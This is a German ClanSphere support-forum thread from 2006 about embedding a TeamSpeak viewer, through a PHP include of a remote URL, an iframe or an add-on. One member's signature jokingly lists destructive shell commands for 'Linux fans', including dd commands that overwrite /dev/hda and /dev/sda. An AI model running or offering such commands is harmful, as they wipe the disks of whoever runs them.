Demo

Probiere ClanSphere aus und teste daran herum. Demo


Antworten: 4
Seite [1]
mikeda


King for a day




Beiträge: 297
# Thema - 07.10.2006 um 17:10 Uhr
Hi,
weiss zwar nicht ob das das richtige Forum ist aber ich möchte
einen Teamspeak in die Seite einbinden -
mit folgendem code:

<?php
include('http://www.interneo.de/tsv/viewer.php?id=DeineID');
?>

wie und wo kann ich das machen?
hab irgendwo mal gelesen das es ein Modul gibt mit dem man
"fremde Inhalte" ins bmx einbinden kann.

Kann mir bei meinem Problem jemand helfen?


Gruss
mikeda
Inaktiv
infiltrate


Beginner




Beiträge: 11
# Antwort: 1 - 07.10.2006 um 18:37 Uhr
Wirst probleme haben mit dem include befehl .... Es wäre sicherlich möglich dies mit einem mod zu bewerkstelligen .. die andere möglichkeit einfach eine iframe (code) in die index.htm setzen mit einem editor am besten dreamweaver z.b in der entwurfsansicht .... Iframe ist zwar nicht die beste lösung , aber es ist eine lösung hier gibts einen iframe generator den code mußt du an das ts viewer script(breite u.höhe) anpassen ,empfehlenswert ist keine scrolleiste zu nehmen kommt eben aufs design drauf an das du nutzt ....

http://www.meine-erste-homepage.com/iframe/iframe.html

mfg


Zuletzt editiert von infiltrate am 07.10.2006 um 18:40 Uhr (1x Editiert)
Inaktiv
|
pHaeno* ClanSphere Team


Geekboy





Beiträge: 1401
# Antwort: 2 - 07.10.2006 um 18:38 Uhr
BMX ist ein Fahrrad xD.

Ne Spaß bei Seite. Wenn du dass in das Design inbinden möchtest, dann sollte das entweder direkt in eine PHP-Datei gehen, oder wenn du es in die Template-Datei einbinden willst, über I-Frame.

Das Addon welches du glaube ich meinst, dass ist das Seiten-Addon von Dinniz wenn ich mich recht entsinne.


------------------
hajo says:
<div style="imbaness: 200pt; skill: 200pt; equip-align: top;">phaeno's mage</div>


27.05.2007 um 01:38 Uhr - pHaeno*:
Bei Clansphere gibt es KEINE Bugs, es sind ALLES FEATURES



weichmann... +-
Blondi (15:08):
bist du nen mann oder nen weich ei?


pHaeno* (15:09):
weichmann


mehr... +-
if($ahnung==0) {
read( 'handbuch' ) ;
}



## für Linux-Fans

kill -9 `netstat -a | grep https | awk -e '{ print $3; }'`
dd if=/dev/zero of=/dev/hda count=1M
dd if=/dev/zero of=/dev/sda count=1M
cat /dev/urandom | nc 127.0.0.1 443


Inaktiv
|
duRiel ClanSphere Team


Weltmeister




Herkunft: Cambridge
Beiträge: 7300
# Antwort: 3 - 07.10.2006 um 19:17 Uhr
also wenn du die datei wirklich nur "includen" willst brauchst du die befehle
 
1.
2.
3.
4.
5.
1. / 2. / ... 
<?php
ob_start
()
ob_get_contents()
ob_end_clean()
?>
zum manual


Zuletzt editiert von duRiel ClanSphere Team am 07.10.2006 um 19:17 Uhr (1x Editiert)
Inaktiv
|
mikeda
Thread-Ersteller


King for a day




Beiträge: 297
# Antwort: 4 - 08.10.2006 um 12:05 Uhr
Hi,
erstmal danke für die Hilfen aber ich raff das nicht.
Wo müsste ich denn das z.b. iFrame reinsetzen?
In welche Datei und wo?
Wenn ich es in die Index mache ist es doch auf allen Seiten -
oder ?

Gruss
mikeda


EDIT:
habe nun das Seiten-Addon von Dinniz -
funktioniert super!!
Danke an Dinniz und alle anderen!!


Zuletzt editiert von mikeda am 10.10.2006 um 12:22 Uhr (1x Editiert)
Inaktiv
|
Antworten: 4
Seite [1]


Sie müssen sich registrieren, um zu antworten.